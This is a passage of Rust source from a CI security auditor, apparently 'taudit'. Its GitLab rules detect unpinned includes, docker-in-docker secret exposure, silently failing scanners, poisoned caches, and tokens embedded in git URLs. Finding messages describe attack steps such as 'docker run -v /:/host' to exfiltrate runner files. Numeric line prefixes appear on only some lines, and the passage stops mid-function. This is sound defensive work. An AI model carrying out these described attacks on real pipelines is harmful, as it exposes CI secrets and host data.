/// True when `url` textually contains a reference to `var`, written either
/// as `$VAR` or as `${VAR}`. No quoting or sanitiser analysis is performed.
fn url_interpolates_var(url: &str, var: &str) -> bool {
    [format!("${var}"), format!("${{{var}}}")]
        .iter()
        .any(|reference| url.contains(reference.as_str()))
}
5013
5014// ── GitLab CI rules ─────────────────────────────────────
5015//
5016// Five rules sourced from the v0.9.0 GitLab corpus gap analysis (council
5017// review of 277 .gitlab-ci.yml files). Detection inputs come from metadata
5018// stamped by `taudit-parse-gitlab` — see `META_GITLAB_*` constants. Each rule
5019// is a no-op on graphs from non-GitLab parsers (the markers will simply be
5020// absent), so wiring all five into `run_all_rules` is safe.
5021
/// Branch names treated as mutable when they appear as the `ref:` of an
/// include. Whoever can push to such a branch on the source repository can
/// change what every consumer's pipeline pulls in.
const MUTABLE_BRANCH_REFS: &[&str] = &[
    "main",
    "master",
    "develop",
    "dev",
    "trunk",
    "default",
    "HEAD",
];
5027
/// Extracts the ref from a GitLab raw-file URL (`…/-/raw/<ref>/<path>`) and
/// returns it when it looks like a branch.
///
/// Returns `None` when the URL has no `/-/raw/` marker, when the segment
/// after the marker is empty, or when that segment looks immutable:
/// - exactly 40 hexadecimal characters (a full commit SHA), or
/// - a `v` immediately followed by a digit (version-tag convention, e.g.
///   `v1.2.3`).
///
/// Anything else is reported as a branch name. Only the first path segment
/// after the marker is considered, so a ref containing `/` is truncated.
fn remote_url_uses_branch(url: &str) -> Option<String> {
    const RAW_MARKER: &str = "/-/raw/";

    let (_, after_marker) = url.split_once(RAW_MARKER)?;
    let ref_seg = after_marker
        .split('/')
        .next()
        .filter(|segment| !segment.is_empty())?;

    let looks_like_sha = ref_seg.len() == 40 && ref_seg.bytes().all(|b| b.is_ascii_hexdigit());
    let looks_like_version_tag =
        matches!(ref_seg.as_bytes(), [b'v', second, ..] if second.is_ascii_digit());

    if looks_like_sha || looks_like_version_tag {
        None
    } else {
        Some(ref_seg.to_string())
    }
}
5054
5055/// Rule: `unpinned_include_remote_or_branch_ref` (High, Supply Chain).
5056///
5057/// Top-level GitLab `include:` of a `remote:` URL pinned to a branch, a
5058/// `project:` whose `ref:` is a mutable branch (main/master/develop/...), or
5059/// an include with no `ref:` at all (defaults to HEAD on the source repo).
5060///
5061/// Skips `local:` includes (same repo — same trust boundary), `template:`
5062/// includes (GitLab-maintained), and `component:` includes that have an `@`
5063/// version pin. Reads the structured `META_GITLAB_INCLUDES` blob the parser
5064/// stamps on the graph.
5065pub fn unpinned_include_remote_or_branch_ref(graph: &AuthorityGraph) -> Vec<Finding> {
5066    use taudit_parse_gitlab_include_view::IncludeView;
5067
5068    let blob = match graph.metadata.get(META_GITLAB_INCLUDES) {
5069        Some(s) => s,
5070        None => return Vec::new(),
5071    };
5072    let entries: Vec<IncludeView> = match serde_json::from_str(blob) {
5073        Ok(e) => e,
5074        Err(_) => return Vec::new(),
5075    };
5076
5077    let mut findings = Vec::new();
5078
5079    for entry in entries {
5080        let kind = entry.kind.as_str();
5081        let target = entry.target.as_str();
5082        let git_ref = entry.git_ref.as_str();
5083
5084        match kind {
5085            // local / template / component — skip (or handled separately for
5086            // unversioned components).
5087            "local" | "template" => continue,
5088            "component" => {
5089                if git_ref.is_empty() {
5090                    findings.push(Finding {
5091                        severity: Severity::High,
5092                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5093                        path: None,
5094                        nodes_involved: vec![],
5095                        message: format!(
5096                            "include: component '{target}' has no version pin (no '@<version>') — owner of the component repo can rewrite every consumer's pipeline silently"
5097                        ),
5098                        recommendation: Recommendation::PinAction {
5099                            current: target.to_string(),
5100                            pinned: format!("{target}@<sha-or-tag>"),
5101                        },
5102                        source: FindingSource::BuiltIn,
5103                        extras: FindingExtras::default(),
5104                    });
5105                }
5106            }
5107            "remote" => {
5108                if let Some(branch) = remote_url_uses_branch(target) {
5109                    findings.push(Finding {
5110                        severity: Severity::High,
5111                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5112                        path: None,
5113                        nodes_involved: vec![],
5114                        message: format!(
5115                            "include: remote URL pins branch '{branch}' ({target}) — included YAML executes with consumer's CI_JOB_TOKEN and secrets; whoever controls that branch can backdoor this pipeline"
5116                        ),
5117                        recommendation: Recommendation::PinAction {
5118                            current: target.to_string(),
5119                            pinned: target.replacen(
5120                                &format!("/-/raw/{branch}/"),
5121                                "/-/raw/<full-sha>/",
5122                                1,
5123                            ),
5124                        },
5125                        source: FindingSource::BuiltIn,
5126                        extras: FindingExtras::default(),
5127                    });
5128                }
5129            }
5130            "project" => {
5131                let lower = git_ref.to_ascii_lowercase();
5132                let is_branch = MUTABLE_BRANCH_REFS
5133                    .iter()
5134                    .any(|b| b.eq_ignore_ascii_case(&lower));
5135                let missing = git_ref.is_empty();
5136                let is_sha = git_ref.len() == 40 && git_ref.chars().all(|c| c.is_ascii_hexdigit());
5137                if (missing || is_branch) && !is_sha {
5138                    let why = if missing {
5139                        "no `ref:` (defaults to HEAD on source project)".to_string()
5140                    } else {
5141                        format!("`ref: {git_ref}` is a mutable branch")
5142                    };
5143                    findings.push(Finding {
5144                        severity: Severity::High,
5145                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5146                        path: None,
5147                        nodes_involved: vec![],
5148                        message: format!(
5149                            "include: project '{target}' — {why}; included YAML can redefine every job's `script:` and runs with consumer's secrets"
5150                        ),
5151                        recommendation: Recommendation::PinAction {
5152                            current: format!(
5153                                "project: {target}{}",
5154                                if missing {
5155                                    String::new()
5156                                } else {
5157                                    format!(", ref: {git_ref}")
5158                                }
5159                            ),
5160                            pinned: format!("project: {target}, ref: <full-commit-sha>"),
5161                        },
5162                        source: FindingSource::BuiltIn,
5163                        extras: FindingExtras::default(),
5164                    });
5165                }
5166            }
5167            _ => {}
5168        }
5169    }
5170
5171    findings
5172}
5173
5174/// Rule: `dind_service_grants_host_authority` (High, Privilege).
5175///
5176/// A GitLab job that declares a `services: [docker:*-dind]` sidecar AND
5177/// holds at least one secret (other than the implicit, structurally-present
5178/// CI_JOB_TOKEN). The dind sidecar exposes the full Docker socket inside
5179/// the job container, so a malicious build step can `docker run -v /:/host`
5180/// and read the runner host filesystem.
5181pub fn dind_service_grants_host_authority(graph: &AuthorityGraph) -> Vec<Finding> {
5182    let mut findings = Vec::new();
5183
5184    for step in graph.nodes_of_kind(NodeKind::Step) {
5185        let has_dind = step
5186            .metadata
5187            .get(META_GITLAB_DIND_SERVICE)
5188            .map(|v| v == "true")
5189            .unwrap_or(false);
5190        if !has_dind {
5191            continue;
5192        }
5193
5194        // Walk this step's HasAccessTo edges for secrets / non-implicit
5195        // identities. The implicit CI_JOB_TOKEN does not count — every job
5196        // has it by platform design, so flagging on it would emit noise on
5197        // every dind job.
5198        let mut sensitive: Vec<String> = Vec::new();
5199        for edge in graph.edges_from(step.id) {
5200            if edge.kind != EdgeKind::HasAccessTo {
5201                continue;
5202            }
5203            let target = match graph.node(edge.to) {
5204                Some(n) => n,
5205                None => continue,
5206            };
5207            let is_implicit = target
5208                .metadata
5209                .get(META_IMPLICIT)
5210                .map(|v| v == "true")
5211                .unwrap_or(false);
5212            if is_implicit {
5213                continue;
5214            }
5215            match target.kind {
5216                NodeKind::Secret => sensitive.push(target.name.clone()),
5217                NodeKind::Identity => sensitive.push(target.name.clone()),
5218                _ => {}
5219            }
5220        }
5221
5222        if sensitive.is_empty() {
5223            continue;
5224        }
5225
5226        sensitive.sort();
5227        sensitive.dedup();
5228        // Cap the message length — corpora include jobs with dozens of vars.
5229        let preview = if sensitive.len() > 4 {
5230            format!(
5231                "{} (and {} more)",
5232                sensitive[..4].join(", "),
5233                sensitive.len() - 4
5234            )
5235        } else {
5236            sensitive.join(", ")
5237        };
5238
5239        findings.push(Finding {
5240            severity: Severity::High,
5241            category: FindingCategory::DindServiceGrantsHostAuthority,
5242            path: None,
5243            nodes_involved: vec![step.id],
5244            message: format!(
5245                "Step '{}' uses a docker:dind service AND holds secrets [{}] — a malicious build step can `docker run -v /:/host` from inside dind and exfiltrate the runner's filesystem (other jobs' artifacts, cached creds)",
5246                step.name, preview
5247            ),
5248            recommendation: Recommendation::Manual {
5249                action: "Replace docker-in-docker with kaniko / buildah / img for image builds (no privileged sidecar required), OR isolate the dind job to a dedicated runner pool with no shared workspace and no other secrets in scope.".into(),
5250            },
5251            source: FindingSource::BuiltIn,
5252            extras: FindingExtras::default(),
5253        });
5254    }
5255
5256    findings
5257}
5258
/// Lowercase substrings that mark a GitLab job as a security scanner. They
/// are matched against the lowercased job name and the lowercased `extends:`
/// template name.
const SCANNER_PATTERNS: &[&str] = &[
    "sast",
    "dast",
    "secret_detection",
    "secret-detection",
    "dependency_scanning",
    "dependency-scanning",
    "container_scanning",
    "container-scanning",
    "gitleaks",
    "trivy",
    "grype",
    "semgrep",
    "bandit",
    "snyk",
    "license_scanning",
    "license-scanning",
    "iac_scan",
    "iac-scan",
    "fuzz",
    "api_fuzzing",
    "api-fuzzing",
    "coverage_fuzzing",
    "coverage-fuzzing",
];

/// Returns `true` when either `step_name` or the optional `extends` template
/// name contains one of `SCANNER_PATTERNS`, ignoring ASCII case.
fn step_matches_scanner(step_name: &str, extends: Option<&String>) -> bool {
    let mentions_scanner = |candidate: &str| {
        let folded = candidate.to_ascii_lowercase();
        SCANNER_PATTERNS
            .iter()
            .any(|pattern| folded.contains(*pattern))
    };

    mentions_scanner(step_name)
        || extends.map_or(false, |template| mentions_scanner(template.as_str()))
}
5300
5301/// Rule: `security_job_silently_skipped` (Medium, Configuration).
5302///
5303/// A security-scanner job (matched by name or `extends:` template) runs with
5304/// `allow_failure: true` and no `rules:` clause that surfaces the failure.
5305/// The pipeline goes green even when the scan errors out — silent-pass is
5306/// worse than no scan because reviewers trust the badge.
5307///
5308/// We can't statically prove the absence of a "surface failures" rule from
5309/// YAML alone, so we fire whenever `allow_failure: true` is set on a scanner
5310/// job and let the operator confirm. The recommendation guides them to the
5311/// fix.
5312pub fn security_job_silently_skipped(graph: &AuthorityGraph) -> Vec<Finding> {
5313    let mut findings = Vec::new();
5314
5315    for step in graph.nodes_of_kind(NodeKind::Step) {
5316        let allow_failure = step
5317            .metadata
5318            .get(META_GITLAB_ALLOW_FAILURE)
5319            .map(|v| v == "true")
5320            .unwrap_or(false);
5321        if !allow_failure {
5322            continue;
5323        }
5324
5325        let extends = step.metadata.get(META_GITLAB_EXTENDS);
5326        if !step_matches_scanner(&step.name, extends) {
5327            continue;
5328        }
5329
5330        let how = match extends {
5331            Some(e) => format!("matched by extends: {e}"),
5332            None => "matched by job name".to_string(),
5333        };
5334
5335        findings.push(Finding {
5336            severity: Severity::Medium,
5337            category: FindingCategory::SecurityJobSilentlySkipped,
5338            path: None,
5339            nodes_involved: vec![step.id],
5340            message: format!(
5341                "Security-scanner job '{}' ({how}) runs with allow_failure: true — when the scan errors out the pipeline still goes green; reviewers trust a badge that is no longer evidence",
5342                step.name
5343            ),
5344            recommendation: Recommendation::Manual {
5345                action: "Either drop `allow_failure: true` and let the scanner gate the pipeline, OR add a follow-up `rules:` clause that surfaces the failure (e.g. a stage that asserts the scan report exists and is non-empty). A scanner that fails closed is worth more than a scanner that fails silently.".into(),
5346            },
5347            source: FindingSource::BuiltIn,
5348            extras: FindingExtras::default(),
5349        });
5350    }
5351
5352    findings
5353}
5354
5355/// Rule: `child_pipeline_trigger_inherits_authority` (Medium, Propagation).
5356///
5357/// A GitLab `trigger:` job (downstream / child pipeline) either runs in
5358/// `merge_request_event` context OR is a *dynamic* child pipeline whose
5359/// included YAML comes from a previous job's `artifact:`. Both shapes mean
5360/// untrusted input shapes the pipeline that runs with the parent project's
5361/// CI_JOB_TOKEN and secrets.
5362pub fn child_pipeline_trigger_inherits_authority(graph: &AuthorityGraph) -> Vec<Finding> {
5363    let graph_is_mr = graph
5364        .metadata
5365        .get(META_TRIGGER)
5366        .map(|v| v == "merge_request")
5367        .unwrap_or(false);
5368
5369    let mut findings = Vec::new();
5370
5371    for step in graph.nodes_of_kind(NodeKind::Step) {
5372        let kind = match step.metadata.get(META_GITLAB_TRIGGER_KIND) {
5373            Some(k) => k.as_str(),
5374            None => continue,
5375        };
5376
5377        let is_dynamic = kind == "dynamic";
5378        let is_mr = graph_is_mr;
5379
5380        if !is_dynamic && !is_mr {
5381            continue;
5382        }
5383
5384        let mut reasons: Vec<&str> = Vec::new();
5385        if is_dynamic {
5386            reasons.push("includes child YAML from a previous job's artifact (dynamic child pipeline — code-injection sink)");
5387        }
5388        if is_mr {
5389            reasons.push(
5390                "runs in merge_request_event context — fork code shapes the downstream pipeline",
5391            );
5392        }
5393        let why = reasons.join(" AND ");
5394
5395        findings.push(Finding {
5396            severity: Severity::Medium,
5397            category: FindingCategory::ChildPipelineTriggerInheritsAuthority,
5398            path: None,
5399            nodes_involved: vec![step.id],
5400            message: format!(
5401                "Trigger job '{}' {why}; the downstream pipeline inherits the parent project's CI_JOB_TOKEN and any reachable secrets",
5402                step.name
5403            ),
5404            recommendation: Recommendation::Manual {
5405                action: "For dynamic child pipelines: validate the generated YAML against a schema before triggering, or pre-stage all child pipeline files in-tree and use `include:` (static) instead of `include: artifact:`. For MR-triggered triggers: gate the downstream with `rules: if: $CI_PIPELINE_SOURCE != 'merge_request_event'` so fork PRs cannot reach it.".into(),
5406            },
5407            source: FindingSource::BuiltIn,
5408            extras: FindingExtras::default(),
5409        });
5410    }
5411
5412    findings
5413}
5414
/// Classifies a cache `key:` (surrounding whitespace ignored) and explains
/// why it is shared too broadly, or returns `None` when no unsafe shape is
/// recognised.
///
/// Unsafe shapes:
/// - empty key — treated like GitLab's single shared `default` key;
/// - exactly `$CI_JOB_NAME` (any ASCII case) or `${CI_JOB_NAME}`;
/// - any key without a `$` interpolation, i.e. hardcoded.
///
/// `$CI_COMMIT_REF_SLUG` is not judged here because its safety depends on
/// the cache policy, which only the caller knows.
fn unsafe_cache_key(key: &str) -> Option<&'static str> {
    const JOB_NAME_ONLY: &str =
        "`$CI_JOB_NAME` only — same name on MR and default-branch jobs share the cache";

    match key.trim() {
        "" => Some("absent (defaults to a single shared 'default' key per runner)"),
        "${CI_JOB_NAME}" => Some(JOB_NAME_ONLY),
        bare if bare.eq_ignore_ascii_case("$CI_JOB_NAME") => Some(JOB_NAME_ONLY),
        literal if !literal.contains('$') => {
            Some("hardcoded — every job and every branch share the same cache")
        }
        _ => None,
    }
}
5440
5441/// Rule: `cache_key_crosses_trust_boundary` (Medium, Supply Chain).
5442///
5443/// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
5444/// only, or `$CI_COMMIT_REF_SLUG` *without* a `policy: pull` restriction.
5445/// Caches are stored per-runner keyed by `key:` — a poisoned MR can push a
5446/// malicious `node_modules/` cache that the next default-branch job
5447/// downloads and executes.
5448pub fn cache_key_crosses_trust_boundary(graph: &AuthorityGraph) -> Vec<Finding> {
5449    let mut findings = Vec::new();
5450
5451    for step in graph.nodes_of_kind(NodeKind::Step) {
5452        let key = match step.metadata.get(META_GITLAB_CACHE_KEY) {
5453            Some(k) => k,
5454            None => continue,
5455        };
5456        let policy = step
5457            .metadata
5458            .get(META_GITLAB_CACHE_POLICY)
5459            .map(|s| s.as_str())
5460            .unwrap_or("pull-push"); // GitLab's runtime default
5461
5462        // pull-only consumers cannot poison the cache — skip those
5463        let is_pull_only = matches!(policy, "pull");
5464
5465        let trimmed = key.trim();
5466
5467        // Per-ref key: $CI_COMMIT_REF_SLUG. Safe ONLY when the consuming jobs
5468        // restrict themselves to `policy: pull`. Without that restriction, an
5469        // MR job pushes a cache the next protected-branch job downloads
5470        // (refs are *namespaced* but not *isolated* — the same key on `main`
5471        // shadows over time and the runner's per-key store is shared).
5472        let is_ref_slug = trimmed == "$CI_COMMIT_REF_SLUG"
5473            || trimmed == "${CI_COMMIT_REF_SLUG}"
5474            || trimmed.eq_ignore_ascii_case("$ci_commit_ref_slug");
5475        if is_ref_slug {
5476            if !is_pull_only {
5477                findings.push(Finding {
5478                    severity: Severity::Medium,
5479                    category: FindingCategory::CacheKeyCrossesTrustBoundary,
5480                    path: None,
5481                    nodes_involved: vec![step.id],
5482                    message: format!(
5483                        "Step '{}' uses cache key `$CI_COMMIT_REF_SLUG` with policy `{policy}` — MR jobs can push poisoned caches that subsequent default-branch jobs restore (npm install / Maven plugin resolution executes cached artifacts)",
5484                        step.name
5485                    ),
5486                    recommendation: Recommendation::Manual {
5487                        action: "Set `policy: pull` on jobs that consume the cache from a different trust context (default-branch, protected refs), and restrict `policy: push` to a dedicated job that runs only on protected branches. Combine with `key: { files: [package-lock.json] }` so cache reuse requires identical input hashes.".into(),
5488                    },
5489                    source: FindingSource::BuiltIn,
5490                    extras: FindingExtras::default(),
5491                });
5492            }
5493            continue;
5494        }
5495
5496        if let Some(reason) = unsafe_cache_key(key) {
5497            findings.push(Finding {
5498                severity: Severity::Medium,
5499                category: FindingCategory::CacheKeyCrossesTrustBoundary,
5500                path: None,
5501                nodes_involved: vec![step.id],
5502                message: format!(
5503                    "Step '{}' has cache key `{key}` ({reason}) with policy `{policy}` — caches cross trust boundaries; an MR or fork can stage a poisoned cache that the next protected-branch job restores and executes",
5504                    step.name
5505                ),
5506                recommendation: Recommendation::Manual {
5507                    action: "Scope the cache key to inputs only an authorized run can produce, e.g. `key: { files: [package-lock.json] }` so the key changes when dependencies change, and combine with `policy: pull` on consumers in higher trust contexts.".into(),
5508                },
5509                source: FindingSource::BuiltIn,
5510                extras: FindingExtras::default(),
5511            });
5512        }
5513    }
5514
5515    findings
5516}
5517
5518/// Local view-struct mirroring `taudit_parse_gitlab::IncludeEntry` — kept here
5519/// so taudit-core does not depend on taudit-parse-gitlab. The two crates pass
5520/// data only through the JSON blob in `META_GITLAB_INCLUDES`.
5521mod taudit_parse_gitlab_include_view {
5522    use serde::Deserialize;
5523    #[derive(Debug, Clone, Deserialize)]
5524    pub struct IncludeView {
5525        pub kind: String,
5526        pub target: String,
5527        pub git_ref: String,
5528    }
5529}
5530
5531/// Rule: a CI script body constructs an HTTPS git URL with credentials
5532/// embedded directly in the URL (`https://user:$TOKEN@host/...`) and
5533/// invokes git against it (`git clone`, `git push`, `git remote set-url`,
5534/// `git fetch`, `git ls-remote`).
5535///
5536/// Detection: scan `META_SCRIPT_BODY` for the regex equivalent
5537/// `https://[^/\s'"]*:\$\{?[A-Z0-9_]*(TOKEN|PAT|PASSWORD|PASSWD|KEY|SECRET)[A-Z0-9_]*\}?@`
5538/// implemented byte-by-byte to keep the dependency surface minimal.
5539///
5540/// Severity: **High**. Embedded credentials persist in `.git/config`,
5541/// are visible to every subsequent process via `ps`/`/proc/*/cmdline`,
5542/// land in `GIT_TRACE` output when set, and may be uploaded as part of
5543/// any artifact that bundles the workspace.
5544pub fn pat_embedded_in_git_remote_url(graph: &AuthorityGraph) -> Vec<Finding> {
5545    let mut findings = Vec::new();
5546
5547    for step in graph.nodes_of_kind(NodeKind::Step) {
5548        let body = match step.metadata.get(META_SCRIPT_BODY) {
5549            Some(b) if !b.trim().is_empty() => b,
5550            _ => continue,
5551        };
5552
5553        let hits = find_credential_embedded_git_urls(body);
5554        if hits.is_empty() {
5555            continue;
5556        }
5557
5558        // Cap message previews so we don't spam logs with huge URLs.
5559        let preview: String = hits
5560            .iter()
5561            .take(2)
5562            .map(|s| s.as_str())
5563            .collect::<Vec<_>>()
5564            .join(", ");
5565        let suffix = if hits.len() > 2 {
5566            format!(", and {} more", hits.len() - 2)
5567        } else {
5568            String::new()
5569        };
5570
5571        findings.push(Finding {
5572            severity: Severity::High,
5573            category: FindingCategory::PatEmbeddedInGitRemoteUrl,
5574            path: None,
5575            nodes_involved: vec![step.id],
5576            message: format!(
5577                "Step '{}' embeds a credential variable directly in a git remote URL ({}{}). The token value is exposed in process argv (visible to `ps`), persists in .git/config for the rest of the job, and is captured by GIT_TRACE if enabled.",
5578                step.name, preview, suffix
5579            ),
5580            recommendation: Recommendation::Manual {
5581                action: "Use a credential helper or env-var-based authentication instead of inlining the token in the URL. For GitLab CI, prefer `git -c http.extraHeader=\"PRIVATE-TOKEN: $PAT_TOKEN\" push <url>`, or set `CI_JOB_TOKEN` as the credential helper. Never construct `https://user:$TOKEN@host/...` URLs.".into(),
5582            },
5583            source: FindingSource::BuiltIn,
5584            extras: FindingExtras::default(),
5585        });
5586    }
5587
5588    findings
5589}
5590
/// Collects URLs in `body` of the shape `https://<user>:<credential-var>@host`.
///
/// Each hit is the text from `https://` up to (not including) the first `/`,
/// space, tab, newline, carriage return, or quote character (`"`, `'`, `` ` ``)
/// that follows the scheme. Hits are de-duplicated, kept in first-seen
/// order and capped at 8. A hit longer than 120 bytes is shortened to at
/// most 120 bytes plus `…`; the cut is moved back to a UTF-8 character
/// boundary so a non-ASCII host name cannot cause a slicing panic.
///
/// Whether the userinfo part counts as a credential reference is decided by
/// `url_authority_has_embedded_credential_var`.
fn find_credential_embedded_git_urls(body: &str) -> Vec<String> {
    const SCHEME: &str = "https://";
    const MAX_HITS: usize = 8;
    const MAX_PREVIEW_BYTES: usize = 120;

    let mut hits: Vec<String> = Vec::new();
    // `cursor` is always 0 or the index of an ASCII terminator / end of
    // string, so slicing `body` at it is always on a character boundary.
    let mut cursor = 0usize;

    while let Some(offset) = body[cursor..].find(SCHEME) {
        let start = cursor + offset;
        let authority_start = start + SCHEME.len();

        // The authority component ends at the next `/`, whitespace, quote,
        // or the end of the script.
        let end = body[authority_start..]
            .find(|c: char| matches!(c, '/' | ' ' | '\t' | '\n' | '\r' | '"' | '\'' | '`'))
            .map_or(body.len(), |rel| authority_start + rel);

        if url_authority_has_embedded_credential_var(&body[authority_start..end]) {
            let url = &body[start..end];
            let preview = if url.len() > MAX_PREVIEW_BYTES {
                // Back off to a character boundary before slicing.
                let mut cut = MAX_PREVIEW_BYTES;
                while !url.is_char_boundary(cut) {
                    cut -= 1;
                }
                format!("{}…", &url[..cut])
            } else {
                url.to_string()
            };
            if !hits.contains(&preview) {
                hits.push(preview);
                if hits.len() == MAX_HITS {
                    break;
                }
            }
        }

        // Resume after this URL's authority; `end` is always past `start`.
        cursor = end;
    }

    hits
}

/// Decides whether a URL authority component (everything after `https://`
/// and before the path) carries a credential-shaped variable reference in
/// its password position: `user:$TOKEN_NAME@host` or `user:${TOKEN_NAME}@host`.
///
/// Requirements, in order:
/// - an `@`, with a `:` somewhere before it;
/// - the text between that `:` and the `@` starts with at least one `$`
///   (several are tolerated, e.g. an escaped `$$VAR`), so literal
///   placeholders such as `user:PASSWORD@host` are not reported;
/// - after dropping the `$` and any surrounding `{` / `}`, the name is
///   non-empty and made only of ASCII uppercase letters, digits and `_`;
/// - the name contains one of TOKEN, PAT, PASSWORD, PASSWD, KEY, SECRET, CRED.
fn url_authority_has_embedded_credential_var(authority: &str) -> bool {
    const CRED_FRAGMENTS: &[&str] = &[
        "TOKEN", "PAT", "PASSWORD", "PASSWD", "KEY", "SECRET", "CRED",
    ];

    let userinfo = match authority.split_once('@') {
        Some((userinfo, _host)) => userinfo,
        None => return false,
    };
    let password = match userinfo.split_once(':') {
        Some((_user, password)) => password,
        None => return false,
    };

    // A variable reference must begin with `$`; anything else is a literal.
    let reference = password.trim_start_matches('$');
    if reference.len() == password.len() {
        return false;
    }

    // Strip optional `${...}` braces so only the variable name remains.
    let name = reference.trim_start_matches('{').trim_end_matches('}');

    !name.is_empty()
        && name
            .chars()
            .all(|c| c.is_ascii_uppercase() || c.is_ascii_digit() || c == '_')
        && CRED_FRAGMENTS.iter().any(|frag| name.contains(*frag))
}
5688
5689/// Rule: a CI script triggers a different project's pipeline via the GitLab
5690/// REST API using `CI_JOB_TOKEN` and forwards variables via the
5691/// `variables[KEY]=value` query/form parameter. Cross-project authority
5692/// bridge — the downstream project's security depends on the trust contract
5693/// between the two projects, and variable values flowing across that
5694/// boundary may originate from MR/fork context the attacker controls.
5695///
5696/// Severity: **Medium**. Higher-risk when the triggering job runs on MR
5697/// pipelines (`META_TRIGGER == "merge_request"`) — the message annotates
5698/// that case explicitly so operators see the elevated risk.
5699pub fn ci_token_triggers_downstream_with_variable_passthrough(
5700    graph: &AuthorityGraph,
5701) -> Vec<Finding> {
5702    let mut findings = Vec::new();
5703    let pipeline_is_mr_triggered = graph
5704        .metadata
5705        .get(META_TRIGGER)
5706        .map(|t| t == "merge_request")
5707        .unwrap_or(false);
5708
5709    for step in graph.nodes_of_kind(NodeKind::Step) {
5710        let body = match step.metadata.get(META_SCRIPT_BODY) {
5711            Some(b) if !b.trim().is_empty() => b,
5712            _ => continue,
5713        };
5714
5715        if !script_triggers_downstream_with_passthrough(body) {
5716            continue;
5717        }
5718
5719        let suffix = if pipeline_is_mr_triggered {
5720            " (pipeline triggered on merge_request — variable values may originate from attacker-controlled MR context)"
5721        } else {
5722            ""
5723        };
5724
5725        findings.push(Finding {
5726            severity: Severity::Medium,
5727            category: FindingCategory::CiTokenTriggersDownstreamWithVariablePassthrough,
5728            path: None,
5729            nodes_involved: vec![step.id],
5730            message: format!(
5731                "Step '{}' triggers a downstream pipeline via the GitLab REST API using CI_JOB_TOKEN and forwards variables[…] in the request — this is a cross-project authority channel that bypasses the parent-child trust model{}",
5732                step.name, suffix
5733            ),
5734            recommendation: Recommendation::Manual {
5735                action: "Constrain which variables the downstream pipeline accepts (use `variables.X.expand: false` and explicit allowlists), prefer pipeline triggers via `trigger:` keyword with `strategy: depend` over `curl … CI_JOB_TOKEN …`, and audit the receiving project's CI/CD settings to ensure it does not honour caller-supplied variables on protected refs.".into(),
5736            },
5737            source: FindingSource::BuiltIn,
5738                extras: FindingExtras::default(),
5739});
5740    }
5741
5742    findings
5743}
5744
/// Returns `true` when `body` looks like a script that triggers a GitLab
/// pipeline with `CI_JOB_TOKEN` while passing variables along.
///
/// All three textual markers must be present anywhere in the script:
/// - a trigger endpoint: `trigger/pipeline`, or both `/api/v4/projects/` and
///   `/trigger` (case-insensitive);
/// - `ci_job_token` (case-insensitive);
/// - `variables[` (case-sensitive), which covers both the query-string form
///   (`variables[X]=...`) and the form-data form (`-F "variables[X]=..."`).
fn script_triggers_downstream_with_passthrough(body: &str) -> bool {
    let folded = body.to_lowercase();
    let mentions = |needle: &str| folded.contains(needle);

    let hits_trigger_endpoint =
        mentions("trigger/pipeline") || (mentions("/api/v4/projects/") && mentions("/trigger"));

    hits_trigger_endpoint && mentions("ci_job_token") && body.contains("variables[")
}
5764
5765/// Rule: a job emits an `artifacts.reports.dotenv: <file>` artifact whose
5766/// contents become pipeline variables for any consumer linked via `needs:`
5767/// or `dependencies:`. A consumer in a later stage that targets a
5768/// production-named environment inherits those variables transparently.
5769/// Producer-side risk amplifies when the script reads attacker-influenced
5770/// inputs (`CI_COMMIT_REF_NAME`, `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`,
5771/// `CI_COMMIT_TAG`, branch/commit derived strings).
5772///
5773/// Severity: **High** when a producer→consumer chain exists with a
5774/// production-like environment on the consumer; **Medium** when the chain
5775/// exists but no production environment is detected (still a covert
5776/// variable-promotion channel).
5777pub fn dotenv_artifact_flows_to_privileged_deployment(graph: &AuthorityGraph) -> Vec<Finding> {
5778    let mut findings = Vec::new();
5779
5780    // Build (producer name -> producer step id, dotenv file) index.
5781    let mut producers: std::collections::HashMap<String, (NodeId, String)> =
5782        std::collections::HashMap::new();
5783    for step in graph.nodes_of_kind(NodeKind::Step) {
5784        if let Some(file) = step.metadata.get(META_DOTENV_FILE) {
5785            if let Some(job) = step.metadata.get(META_JOB_NAME) {
5786                producers.insert(job.clone(), (step.id, file.clone()));
5787            }
5788        }
5789    }
5790    if producers.is_empty() {
5791        return findings;
5792    }
5793
5794    for consumer in graph.nodes_of_kind(NodeKind::Step) {
5795        let needs_csv = match consumer.metadata.get(META_NEEDS) {
5796            Some(s) if !s.is_empty() => s,
5797            _ => continue,
5798        };
5799        let upstream_jobs: Vec<&str> = needs_csv.split(',').filter(|s| !s.is_empty()).collect();
5800        let matched: Vec<&(NodeId, String)> = upstream_jobs
5801            .iter()
5802            .filter_map(|j| producers.get(*j))
5803            .collect();
5804        if matched.is_empty() {
5805            continue;
5806        }
5807
5808        let env_name = consumer
5809            .metadata
5810            .get(META_ENVIRONMENT_NAME)
5811            .map(String::as_str)
5812            .unwrap_or("");
5813        // Production-like signal: explicit `environment.name:` value, OR
5814        // (fallback) the job name itself encodes a production marker.
5815        // GitLab pipelines often skip the explicit `environment:` block
5816        // and rely on stage/job naming conventions like `deploy-prod`.
5817        let consumer_job = consumer
5818            .metadata
5819            .get(META_JOB_NAME)
5820            .map(String::as_str)
5821            .unwrap_or(consumer.name.as_str());
5822        let production_like =
5823            is_production_environment(env_name) || is_production_environment(consumer_job);
5824
5825        // Decide elevation: production-like consumer environment OR
5826        // producer script ingests attacker-influenced CI variables.
5827        let producer_uses_untrusted_input = matched.iter().any(|(pid, _)| {
5828            graph
5829                .node(*pid)
5830                .and_then(|n| n.metadata.get(META_SCRIPT_BODY))
5831                .map(|b| script_uses_attacker_influenced_ci_var(b))
5832                .unwrap_or(false)
5833        });
5834
5835        if !production_like && !producer_uses_untrusted_input {
5836            continue; // benign dotenv flow — skip
5837        }
5838
5839        let severity = if production_like {
5840            Severity::High
5841        } else {
5842            Severity::Medium
5843        };
5844
5845        let producer_names: Vec<String> = upstream_jobs
5846            .iter()
5847            .filter(|j| producers.contains_key(**j))
5848            .map(|s| (*s).to_string())
5849            .collect();
5850
5851        let env_suffix = if production_like {
5852            if env_name.is_empty() {
5853                format!(" targeting production-like job name '{consumer_job}'")
5854            } else {
5855                format!(" targeting production-like environment '{env_name}'")
5856            }
5857        } else {
5858            String::new()
5859        };
5860        let trust_suffix = if producer_uses_untrusted_input {
